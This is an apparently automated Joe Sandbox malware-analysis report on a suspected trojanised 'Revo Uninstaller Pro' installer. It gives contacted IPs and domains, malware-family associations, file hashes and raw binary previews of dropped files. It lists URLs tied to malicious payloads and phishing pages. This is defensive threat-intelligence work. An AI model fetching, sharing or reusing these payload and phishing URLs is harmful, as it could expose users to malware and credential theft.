                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                    • 75% < No. of IPs
                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                    107.167.96.36
                                                                                                                                    na-download.opera.comUnited States
                                                                                                                                    53755IOFLOODUSfalse
                                                                                                                                    104.20.4.235
                                                                                                                                    pastebin.comUnited States
                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                    194.87.189.43
                                                                                                                                    mail.repack.meRussian Federation
                                                                                                                                    197695AS-REGRUfalse
                                                                                                                                    107.167.96.38
                                                                                                                                    unknownUnited States
                                                                                                                                    53755IOFLOODUSfalse
                                                                                                                                    107.167.96.39
                                                                                                                                    na-autoupdate.opera.comUnited States
                                                                                                                                    53755IOFLOODUSfalse
                                                                                                                                    107.167.110.216
                                                                                                                                    lati.lb.opera.technologyUnited States
                                                                                                                                    21837OPERASOFTWAREUSfalse
                                                                                                                                    107.167.96.30
                                                                                                                                    trn.lb.opera.technologyUnited States
                                                                                                                                    53755IOFLOODUSfalse
                                                                                                                                    107.167.125.189
                                                                                                                                    submit-trn.osp.opera.softwareUnited States
                                                                                                                                    21837OPERASOFTWAREUSfalse
                                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                                    Analysis ID:1571786
                                                                                                                                    Start date and time:2024-12-09 17:37:54 +01:00
                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                    Overall analysis duration:0h 11m 55s
                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                    Report type:full
                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                    Number of analysed new started processes analysed:35
                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                    Technologies:
                                                                                                                                    • HCA enabled
                                                                                                                                    • EGA enabled
                                                                                                                                    • AMSI enabled
                                                                                                                                    Analysis Mode:default
                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                    Sample name:Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                    Detection:MAL
                                                                                                                                    Classification:mal44.troj.evad.winEXE@44/128@9/8
                                                                                                                                    EGA Information:
                                                                                                                                    • Successful, ratio: 62.5%
                                                                                                                                    HCA Information:
                                                                                                                                    • Successful, ratio: 96%
                                                                                                                                    • Number of executed functions: 389
                                                                                                                                    • Number of non-executed functions: 102
                                                                                                                                    Cookbook Comments:
                                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                                                                                                                    • Excluded IPs from analysis (whitelisted): 92.123.181.8, 92.123.181.96, 172.202.163.200, 23.206.229.209
                                                                                                                                    • Excluded domains from analysis (whitelisted): www.bing.com, ocsp.digicert.com, e125010.dscd.akamaiedge.net, slscr.update.microsoft.com, v2.download3.operacdn.com.edgekey.net, fe3cr.delivery.mp.microsoft.com
                                                                                                                                    • Execution Graph export aborted for target powershell.exe, PID 7516 because it is empty
                                                                                                                                    • Execution Graph export aborted for target ruplp.exe, PID 5116 because there are no executed function
                                                                                                                                    • Execution Graph export aborted for target setup.exe, PID 8092 because there are no executed function
                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                    • VT rate limit hit for: Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                    TimeTypeDescription
                                                                                                                                    11:39:39API Interceptor39x Sleep call for process: powershell.exe modified
                                                                                                                                    11:40:11API Interceptor1806x Sleep call for process: RevoUninPro.exe modified
                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                    104.20.4.235gabe.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                    • pastebin.com/raw/sA04Mwk2
                                                                                                                                    cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                    • pastebin.com/raw/sA04Mwk2
                                                                                                                                    vF20HtY4a4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    • pastebin.com/raw/sA04Mwk2
                                                                                                                                    OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    • pastebin.com/raw/sA04Mwk2
                                                                                                                                    gaber.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                    • pastebin.com/raw/sA04Mwk2
                                                                                                                                    cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                    • pastebin.com/raw/sA04Mwk2
                                                                                                                                    sostener.vbsGet hashmaliciousNjratBrowse
                                                                                                                                    • pastebin.com/raw/V9y5Q5vv
                                                                                                                                    sostener.vbsGet hashmaliciousXWormBrowse
                                                                                                                                    • pastebin.com/raw/V9y5Q5vv
                                                                                                                                    envifa.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                    • pastebin.com/raw/V9y5Q5vv
                                                                                                                                    New Voicemail Invoice 64746w .jsGet hashmaliciousWSHRATBrowse
                                                                                                                                    • pastebin.com/raw/NsQ5qTHr
                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                    submit-trn.osp.opera.softwarefile.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                                                                                                                                    • 107.167.125.189
                                                                                                                                    PDFViewer_46615443.msiGet hashmaliciousUnknownBrowse
                                                                                                                                    • 107.167.125.189
                                                                                                                                    SecuriteInfo.com.Win64.PWSX-gen.7949.23910.exeGet hashmaliciousGluptebaBrowse
                                                                                                                                    • 107.167.125.189
                                                                                                                                    OperaSetup.exeGet hashmaliciousQuasarBrowse
                                                                                                                                    • 107.167.125.189
                                                                                                                                    OperaSetup.exeGet hashmaliciousQuasarBrowse
                                                                                                                                    • 107.167.125.189
                                                                                                                                    trn.lb.opera.technologyhttps://www.upload.ee/files/17435967/DeltaAirLines_t.delta.com.txt.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                    • 107.167.96.30
                                                                                                                                    file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                                                                                                                                    • 107.167.96.31
                                                                                                                                    PDFViewer_46615443.msiGet hashmaliciousUnknownBrowse
                                                                                                                                    • 107.167.96.30
                                                                                                                                    lati.lb.opera.technologySecuriteInfo.com.Trojan.MulDrop24.56436.17805.29816.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    • 107.167.110.216
                                                                                                                                    SecuriteInfo.com.Trojan.MulDrop24.56436.17805.29816.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    • 107.167.110.211
                                                                                                                                    file.exeGet hashmaliciousAmadey, GluptebaBrowse
                                                                                                                                    • 107.167.110.216
                                                                                                                                    file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                                                                                                                                    • 107.167.110.211
                                                                                                                                    LIRR4A0xzv.exeGet hashmaliciousAmadey, Glupteba, LummaC Stealer, Mars Stealer, SmokeLoader, Socks5Systemz, StealcBrowse
                                                                                                                                    • 107.167.110.216
                                                                                                                                    dl7WL77rkA.exeGet hashmaliciousGlupteba, Mars Stealer, Stealc, VidarBrowse
                                                                                                                                    • 107.167.110.211
                                                                                                                                    SecuriteInfo.com.Program.Unwanted.5399.28168.2681.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    • 107.167.110.216
                                                                                                                                    PDFViewer_46615443.msiGet hashmaliciousUnknownBrowse
                                                                                                                                    • 107.167.110.216
                                                                                                                                    Pokemon_ Ruby Version (V1.2).exeGet hashmaliciousUnknownBrowse
                                                                                                                                    • 107.167.110.211
                                                                                                                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                    • 107.167.110.216
                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                    AS-REGRUcXjy5Y6dXX.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                    • 193.124.205.63
                                                                                                                                    SRT68.exeGet hashmaliciousFormBookBrowse
                                                                                                                                    • 194.58.112.174
                                                                                                                                    New Order.exeGet hashmaliciousFormBookBrowse
                                                                                                                                    • 31.31.196.17
                                                                                                                                    72STaC6BmljfbIQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                    • 194.58.112.174
                                                                                                                                    attached invoice.exeGet hashmaliciousFormBookBrowse
                                                                                                                                    • 31.31.196.17
                                                                                                                                    specification and drawing.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                    • 194.58.112.174
                                                                                                                                    Pre Alert PO TVKJEANSA00967.bat.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                    • 194.58.112.174
                                                                                                                                    DO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                    • 37.140.192.206
                                                                                                                                    Fi#U015f.exeGet hashmaliciousFormBookBrowse
                                                                                                                                    • 31.31.196.177
                                                                                                                                    ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                    • 31.31.196.177
                                                                                                                                    CLOUDFLARENETUSfile.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                    • 104.21.67.152
                                                                                                                                    https://maya-lopez.filemail.com/t/BLFGBJSQGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                    • 104.17.25.14
                                                                                                                                    BPzptjK1aF.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                    • 172.67.139.78
                                                                                                                                    file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                    • 104.21.16.9
                                                                                                                                    file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                    • 104.21.67.152
                                                                                                                                    https://mpleho.com/wd/Get hashmaliciousPhisherBrowse
                                                                                                                                    • 104.21.56.67
                                                                                                                                    file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                    • 172.67.177.134
                                                                                                                                    download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                    • 104.20.22.46
                                                                                                                                    download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                    • 104.20.22.46
                                                                                                                                    Rfq_po_december_purchase_list_details_specifications_09_12_2024_0000000000.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                    • 172.67.197.221
                                                                                                                                    IOFLOODUS06.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                    • 107.178.108.41
                                                                                                                                    sdfg.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                    • 107.178.108.41
                                                                                                                                    teste.arm.elfGet hashmaliciousGafgyt, Mirai, Moobot, OkiruBrowse
                                                                                                                                    • 184.164.88.203
                                                                                                                                    https://www.upload.ee/files/17435967/DeltaAirLines_t.delta.com.txt.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                    • 107.167.96.30
                                                                                                                                    nabarm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                    • 148.163.47.37
                                                                                                                                    file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    • 148.163.93.46
                                                                                                                                    file.exeGet hashmaliciousMicroClipBrowse
                                                                                                                                    • 148.163.93.46
                                                                                                                                    IETC-24017.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                    • 107.167.84.42
                                                                                                                                    file.exeGet hashmaliciousFormBookBrowse
                                                                                                                                    • 107.167.84.42
                                                                                                                                    VSP469620.exeGet hashmaliciousFormBookBrowse
                                                                                                                                    • 107.167.84.42
                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                    37f463bf4616ecd445d4a1937da06e19http://crissertaoericardo.com.br/images/document.pif.rarGet hashmaliciousGuLoaderBrowse
                                                                                                                                    • 107.167.96.36
                                                                                                                                    • 104.20.4.235
                                                                                                                                    • 194.87.189.43
                                                                                                                                    • 107.167.96.38
                                                                                                                                    • 107.167.96.39
                                                                                                                                    • 107.167.110.216
                                                                                                                                    • 107.167.96.30
                                                                                                                                    • 107.167.125.189
                                                                                                                                    tQoSuhQIdC.msiGet hashmaliciousUnknownBrowse
                                                                                                                                    • 107.167.96.36
                                                                                                                                    • 104.20.4.235
                                                                                                                                    • 194.87.189.43
                                                                                                                                    • 107.167.96.38
                                                                                                                                    • 107.167.96.39
                                                                                                                                    • 107.167.110.216
                                                                                                                                    • 107.167.96.30
                                                                                                                                    • 107.167.125.189
                                                                                                                                    A8Uynu9lwi.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                    • 107.167.96.36
                                                                                                                                    • 104.20.4.235
                                                                                                                                    • 194.87.189.43
                                                                                                                                    • 107.167.96.38
                                                                                                                                    • 107.167.96.39
                                                                                                                                    • 107.167.110.216
                                                                                                                                    • 107.167.96.30
                                                                                                                                    • 107.167.125.189
                                                                                                                                    MsmxWY8nj7.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                    • 107.167.96.36
                                                                                                                                    • 104.20.4.235
                                                                                                                                    • 194.87.189.43
                                                                                                                                    • 107.167.96.38
                                                                                                                                    • 107.167.96.39
                                                                                                                                    • 107.167.110.216
                                                                                                                                    • 107.167.96.30
                                                                                                                                    • 107.167.125.189
                                                                                                                                    ZAMOWIEN.EXE.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                    • 107.167.96.36
                                                                                                                                    • 104.20.4.235
                                                                                                                                    • 194.87.189.43
                                                                                                                                    • 107.167.96.38
                                                                                                                                    • 107.167.96.39
                                                                                                                                    • 107.167.110.216
                                                                                                                                    • 107.167.96.30
                                                                                                                                    • 107.167.125.189
                                                                                                                                    Lenticels.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                    • 107.167.96.36
                                                                                                                                    • 104.20.4.235
                                                                                                                                    • 194.87.189.43
                                                                                                                                    • 107.167.96.38
                                                                                                                                    • 107.167.96.39
                                                                                                                                    • 107.167.110.216
                                                                                                                                    • 107.167.96.30
                                                                                                                                    • 107.167.125.189
                                                                                                                                    Request for Quotation New collaboration.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                    • 107.167.96.36
                                                                                                                                    • 104.20.4.235
                                                                                                                                    • 194.87.189.43
                                                                                                                                    • 107.167.96.38
                                                                                                                                    • 107.167.96.39
                                                                                                                                    • 107.167.110.216
                                                                                                                                    • 107.167.96.30
                                                                                                                                    • 107.167.125.189
                                                                                                                                    REQUEST FOR QUOATION AND PRICES 01306-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                    • 107.167.96.36
                                                                                                                                    • 104.20.4.235
                                                                                                                                    • 194.87.189.43
                                                                                                                                    • 107.167.96.38
                                                                                                                                    • 107.167.96.39
                                                                                                                                    • 107.167.110.216
                                                                                                                                    • 107.167.96.30
                                                                                                                                    • 107.167.125.189
                                                                                                                                    cllmxIZWcQ.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                    • 107.167.96.36
                                                                                                                                    • 104.20.4.235
                                                                                                                                    • 194.87.189.43
                                                                                                                                    • 107.167.96.38
                                                                                                                                    • 107.167.96.39
                                                                                                                                    • 107.167.110.216
                                                                                                                                    • 107.167.96.30
                                                                                                                                    • 107.167.125.189
                                                                                                                                    qhjKN40R2Q.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                    • 107.167.96.36
                                                                                                                                    • 104.20.4.235
                                                                                                                                    • 194.87.189.43
                                                                                                                                    • 107.167.96.38
                                                                                                                                    • 107.167.96.39
                                                                                                                                    • 107.167.110.216
                                                                                                                                    • 107.167.96.30
                                                                                                                                    • 107.167.125.189
                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                    C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoAppBar.exe56F2F2548297D7B72AF40B7898D1DABE2DCB809038898.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      56F2F2548297D7B72AF40B7898D1DABE2DCB809038898.exeGet hashmaliciousUnknownBrowse
                                                                                                                                        C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll56F2F2548297D7B72AF40B7898D1DABE2DCB809038898.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          56F2F2548297D7B72AF40B7898D1DABE2DCB809038898.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Non-ISO extended-ASCII text, with very long lines (793), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):5590
                                                                                                                                            Entropy (8bit):5.036330960659774
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:ehs4nT03+Pq7sWchbo1Z18HOfMyLGt5aYbCMKgMbl5KTp9P3Rz3lwemW3bk:8HAEq76ubCufst5abLge5KXPJlQQk
                                                                                                                                            MD5:BB9B516486F1A5C2D5AA127355164604
                                                                                                                                            SHA1:712191F838CD5E95F5EC9A32ECD937F1B0119182
                                                                                                                                            SHA-256:0BDF49709C28EDEF8257F7FCB902314181C4FC66C8C3190EB55A30105487A9AC
                                                                                                                                            SHA-512:B29747BEDBC3B14E315FA216CE5ABEB222C354FA6A96055963666EFA3EAD39BF85DF2AB29015EFCB673503337B3BAA255D9AC396C0A503EA6F61B53198671EE8
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:REVO UNINSTALLER PRO LICENSE AGREEMENT AND COPYRIGHT..========================....IMPORTANT: YOU SHOULD CAREFULLY READ THE FOLLOWING LICENSE AGREEMENT. IT WILL BE NECESSARY FOR YOU TO AGREE TO BE BOUND BY THE TERMS OF THIS AGREEMENT BEFORE BEING PERMITTED TO CONTINUE TO INSTALL THE PRODUCT.....This license Agreement is a legal agreement between You (either personal or corporate) and VS REVO GROUP, the developer of the SOFTWARE .Revo Uninstaller Pro.". "VS REVO GROUP" means the developer of the "Revo Uninstaller Pro" software product, VS Revo Group, Ltd. SOFTWARE means Revo Uninstaller Pro product and related explanatory materials. The term "SOFTWARE" also shall include any upgrades, modified versions or updates of the Software licensed to You by VS REVO GROUP.....YOU AGREE TO BE BOUND BY THE TERMS OF THIS LICENSE AGREEMENT AND THE LIMITATIONS OF YOUR LICENSE BY INSTALLING, COPYING, DISTRIBUTING OR OTHERWISE USING the SOFTWARE. IF YOU DO NOT AGREE, DO NOT INSTALL, DISTRIBUTE OR USE REVO
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):191968
                                                                                                                                            Entropy (8bit):6.198794572117837
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:7G5lIaj6Zx5+hKTTn6115xx/Nl19oyUBlBN0AZHVf+3S484:7uSDXb67bPng1G1
                                                                                                                                            MD5:8B9964E06195FD375D126B424E236F03
                                                                                                                                            SHA1:6F1741CFEB9FB70C34857DBBA3E063C88C3C32FA
                                                                                                                                            SHA-256:BDA04B693BFDEA86A7A3B47F2E4CEAE9CD9475C4E81B0AA73B70FD244A65F70F
                                                                                                                                            SHA-512:741019523B4C5F4EF9A7952172309B2D304A84CBD98FFF99A719105CC1938157EDB1691554A21B9DCD2B523C0F1AB0D37879DEEFC3B2FA5579C0D8C76CADE483
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Joe Sandbox View:
                                                                                                                                            • Filename: 56F2F2548297D7B72AF40B7898D1DABE2DCB809038898.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: 56F2F2548297D7B72AF40B7898D1DABE2DCB809038898.exe, Detection: malicious, Browse
                                                                                                                                            Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$..........y.uj*.uj*.uj*3.*.uj*3.*.uj*3.*.uj*.+i+.uj*.+o+.uj*.+n+.uj*b,o+.uj*...*.uj*...*.uj*...*.uj*.uk*&uj*.+n+.uj*.+o+.uj*.+j+.uj*.+.*.uj*.u.*.uj*.+h+.uj*Rich.uj*........PE..d....Jb.........." .....v...P.......{.......................................0......./.... .........................................pS.......T...........3...............5... ..,...0%..T...................(&..(....%...............................................text...8t.......v.................. ..`.rdata...............z..............@..@.data....!...p.......N..............@....pdata...............^..............@..@.gfids...............x..............@..@.tls.................z..............@....rsrc....3.......4...|..............@..@.reloc..,.... ......................@..B........................................................................................................................
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:PDF document, version 1.7, 77 pages
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2172747
                                                                                                                                            Entropy (8bit):7.967339088421113
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:49152:mjdEod4PD0ZuCBbVRBJHRn/kqZebFV46kT0Tw7AKlPm+JRJ:mZEo2DU1f98qZebFV4gT+R1muJ
                                                                                                                                            MD5:7012BC3336963CBF739BDB61C2226041
                                                                                                                                            SHA1:28D5BD206674B796AD22975E0023ADAFF074E163
                                                                                                                                            SHA-256:AA262DB5124FAD214251F81DFA44C19638B785D0E21C395DFDBCB91C37C3376F
                                                                                                                                            SHA-512:004E612C761C91509320983FCEE6F5B0E58136F686874DDAD39937611E6FF76111350B5D3EBA44FE7AF49E71000695B1773AA831731CEB08EDDBE37C0B70386C
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:%PDF-1.7..%......1 0 obj..<</Type/Catalog/Pages 2 0 R/Lang(bg) /Metadata 383 0 R/ViewerPreferences 384 0 R>>..endobj..2 0 obj..<</Type/Pages/Count 77/Kids[ 3 0 R 20 0 R 39 0 R 47 0 R 49 0 R 50 0 R 51 0 R 53 0 R 54 0 R 57 0 R 59 0 R 61 0 R 63 0 R 64 0 R 65 0 R 66 0 R 67 0 R 69 0 R 71 0 R 73 0 R 74 0 R 76 0 R 79 0 R 81 0 R 82 0 R 83 0 R 85 0 R 86 0 R 88 0 R 90 0 R 92 0 R 94 0 R 95 0 R 97 0 R 98 0 R 99 0 R 101 0 R 102 0 R 103 0 R 105 0 R 106 0 R 108 0 R 109 0 R 110 0 R 111 0 R 112 0 R 113 0 R 114 0 R 115 0 R 116 0 R 117 0 R 118 0 R 119 0 R 120 0 R 121 0 R 122 0 R 123 0 R 125 0 R 126 0 R 127 0 R 128 0 R 129 0 R 130 0 R 131 0 R 132 0 R 134 0 R 135 0 R 136 0 R 137 0 R 322 0 R 325 0 R 329 0 R 333 0 R 335 0 R 340 0 R 345 0 R 347 0 R] >>..endobj..3 0 obj..<</Type/Page/Parent 2 0 R/Resources<</ExtGState<</GS5 5 0 R/GS8 8 0 R>>/Font<</F1 6 0 R/F2 9 0 R/F3 11 0 R/F4 13 0 R>>/XObject<</Image18 18 0 R>>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/MediaBox[ 0 0 612 792] /Contents 4 0 R/Group<</Type/Gr
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):9794808
                                                                                                                                            Entropy (8bit):6.9007098668528695
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:98304:3dq5HiSQHu3a6F3+3gqVCnNqNt2A0p/5chEuuZkJaC:3dqtNk6UbhbaC
                                                                                                                                            MD5:D94CAA2ACB6EBAB90BF564AC6BFC1F05
                                                                                                                                            SHA1:965B4E3D1CF653ABC9C68736E5240FA3B50C2C46
                                                                                                                                            SHA-256:DB8B4EB11D18FD1DB9342DFC0155069289A4B0E6A9DF69520463F1224BC51C91
                                                                                                                                            SHA-512:3B24C4351177473D2BFD1CC4488EA9A5A5AEC2BB41801E70B4ACEFCE24C221B10CD491884CD1AA353D71365798FDEE11852F96813AD4468F7BE05787F1DB0AF3
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Joe Sandbox View:
                                                                                                                                            • Filename: 56F2F2548297D7B72AF40B7898D1DABE2DCB809038898.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: 56F2F2548297D7B72AF40B7898D1DABE2DCB809038898.exe, Detection: malicious, Browse
                                                                                                                                            Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.........w.............xL......xL..y...xL......[.......).........t.......w......................................b.........^...[.......^..............[.......Rich............PE..d...'..d..........#.......3..tb.....,H.........@.......................................... ...................................................F.......L...I...H..R...4...@............?.p.....................?.(.....?...............3.@............................text.....3.......3................. ..`.rdata.......3.......3.............@..@.data...@<...`F..N...FF.............@....pdata...R....H..T....G.............@..@.gfids..0.....K.......I.............@..@.giats........L.......K.............@..@.tls..........L.......K.............@....rsrc.....I...L...I...K.............@..@........................................................................................................................
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):190640
                                                                                                                                            Entropy (8bit):6.421539474136109
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:OxneIw3rR+YT5J1zOpXJ5IevXr480/wqqpotGcGe9Nbms:OxBm9vOtr7r48Ct7x
                                                                                                                                            MD5:470F2FEABF6AD0A0EEDB02B02AD4C6E8
                                                                                                                                            SHA1:100887FC63BF34CAE420FFEED51900426B300CF7
                                                                                                                                            SHA-256:78288F4C89D635D0E213F3D2B9BD36D1EE4574CCFBA23E86BD900C7457E48318
                                                                                                                                            SHA-512:4FFD8CB2EB8AAE6CE50727937FE759D6CA70D125427FAC512C8DD5B7BF4F60D3EE92B3C5ABE14C1F1C4B4CBEA04F8217D3A4B075A510355A05299191089EA19D
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......C.&..wH..wH..wH....wH....wH....wH.<)K..wH.<)L..wH.<)M.!wH.....wH..wI.cwH..)A..wH..)...wH..)J..wH.Rich.wH.........PE..d......g..........".................$s.........@..........................................`..................................................w..P...............x........J......\....N..p...........................`O...............................................text............................... ..`.rdata..............................@..@.data................l..............@....pdata..x............x..............@..@.gfids..............................@..@.rsrc...............................@..@.reloc..\...........................@..B................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):25604296
                                                                                                                                            Entropy (8bit):6.723595463931162
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:196608:D8pA5h1COpxhZwpArAfpvuPTxhbmWqPWpyR1pOIIIIIIIIIIIIIIIIIIIIIIIIIh:gpA5h1nrhIAbFhlqPWpyR1pV
                                                                                                                                            MD5:5E2DAB5ED4703B7FA05508A82FB89D69
                                                                                                                                            SHA1:DA4616D9FD7245BF0410291B90D4C72215159F0B
                                                                                                                                            SHA-256:84EC9BC4133175E6E1DB997E650F53EF14448119F5B1FDFF8ED84F1B4DC5FEDD
                                                                                                                                            SHA-512:FE42EA532F58D55FB7ACC53B2B8322F8B60E30EDE050032399E8D3F2AEE1F2967B46863557547E267D6AA52DCE14FA2694F306697CE9C0660BEF898F985DFFCF
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$..........zT.)T.)T.).Iy)@.).Iz)}.)..(C.)..(e.)...(V.).I{)..).I|)G.).uO)V.)o..(..)o..(X.)o..(..).Ig)i.)T.)..)..(..).w)U.)T..)U.)..(U.)RichT.)........................PE..d....JMg..........#.........\.......1Q........@.....................................R.... .....................................................0...............|....f...J..............p.......................(....................................................text...j......................... ..`.rdata...s3......t3................@..@.data........p.......L..............@....pdata..|...........................@..@.gfids..,...........................@..@.giats..............................@..@.tls................................@....rsrc...............................@..@........................................................................................................
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):25576112
                                                                                                                                            Entropy (8bit):6.723822651268559
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:196608:pTOgY7cLQJlZxfRRHfpvuPTxhbmWqPWpyR1pOIIIIIIIIIIIIIIIIIIIIIIIIIIj:pPY7WQJlvf4FhlqPWpyR1pVk
                                                                                                                                            MD5:EE15BFE5A394ADBFB087B053A6A72821
                                                                                                                                            SHA1:FA6FDE156D571986B6DFD94C290DAA80A75E8020
